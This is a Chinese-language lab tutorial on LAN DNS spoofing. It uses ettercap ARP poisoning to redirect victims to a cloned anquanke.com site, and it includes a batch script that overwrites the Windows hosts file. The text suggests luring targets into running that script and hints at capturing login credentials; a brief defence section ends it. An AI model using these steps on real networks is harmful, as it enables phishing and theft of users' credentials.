DNS服务器记录域名所对应的ip，全球总共有13个根域名服务器。
以访问www.anquanke.com为例

理论基础

在浏览器的搜索栏输入www.anquanke.com
1.先查询本地host文件，检测www.anquanke.com有没有对应ip，如果有，直接访问ip，否则进行后续步骤
2.浏览器然后向DNS服务器(网关或者真正的DNS服务器)发送一个包
3.DNS服务器返回对应的ip地址
3.浏览器去访问对应ip

环境

默认网关:192.168.230.2
攻击者ip:192.168.230.128
示例局域网中主机ip:192.168.230.133

同一局域网dns欺骗

未开始攻击，目标主机

image.png

开始攻击

攻击方设置

修改etter.dns文件
vi /etc/ettercap/etter.dns
域名 A 对应的ip地址

tips
如果域名设置为*，则将所有的解析被解析为对应ip
容易暴露身份。

image.png

克隆网站
kali中的httrack一顿回车操作，而且比windows的工具好用多了。
直接命令行输入httrack

无奈安全客的网站克隆的一部分，整个网站太大了，这里仅以举例说明...

image.png image.png image.png image.png

啧啧啧。

在网站目录下将文件拷贝
root@kali:~/websites/anquanke# cp -r * /var/www/html

启动Apache服务
/etc/init.d/apache2 start

启动ettercap
ettercap -G
具体步骤这里不说了，中间人攻击里面有的。
Sniff->unified *->eth0->OK
Hosts->scan*主机扫描
Host List->网关（只需要选定网关就好了）
192.168.230.2 Add to Target 2
Mitm->ARP pos*

上述都做完以后
Plugin->Manege the plugins
双击dns_spoof

image.png

start->start sniffing

同一局域网内的其他主机
访问www.anquanke.com网站，可以看到如下：

image.png
然后显示不全的原因是安全客整个网站太大了，很多规则都没有克隆，另外一方面浏览器版本太低。
点击其中的一个文章，比如点击这篇文章
image.png image.png image.png image.png

可以看到，如果给与足够的时间克隆整个网站，受骗者将会很难以区分是否是真实网站。

dns欺骗的扩展利用

欺骗用户修改host

修改host的文件代码.bat，可以批量添加域名，这里也可以用其他的方式，比如exe文件等，美女图片等等吸引目标点击，本菜这里为了方便，就使用bat了。
set ip=192.168.230.128(攻击者ip/公网可以访问的ip)
set hosts="c:\WINDOWS\system32\drivers\etc\hosts"
echo %ip% www.anquanke.com>%hosts%

在目标主机运行了添加host的bat后，剩余操作和上述类似，即可完成DNS扩展利用。

tips
可以在登录等重要的地方背后添加跳转到正确界面
截取登录用户的用户名和密码
这个懂一些编程语言的同鞋应该很容易做到
本菜这里就不演示了。

tips
本菜这里对目录中的路径没有做修改，所以url会出现两个www.anquanke.com
这里也是新手容易忽视的地方，不过可以简单的修改文件路径。

DNS欺骗的防治

1.在C盘根目录的autoexec.bat中输入绑定IP和MAC到网关的命令可以实现开机自动绑定
2.在路由中绑定MAC和IP
3.安装ARP防火墙或者网络防火墙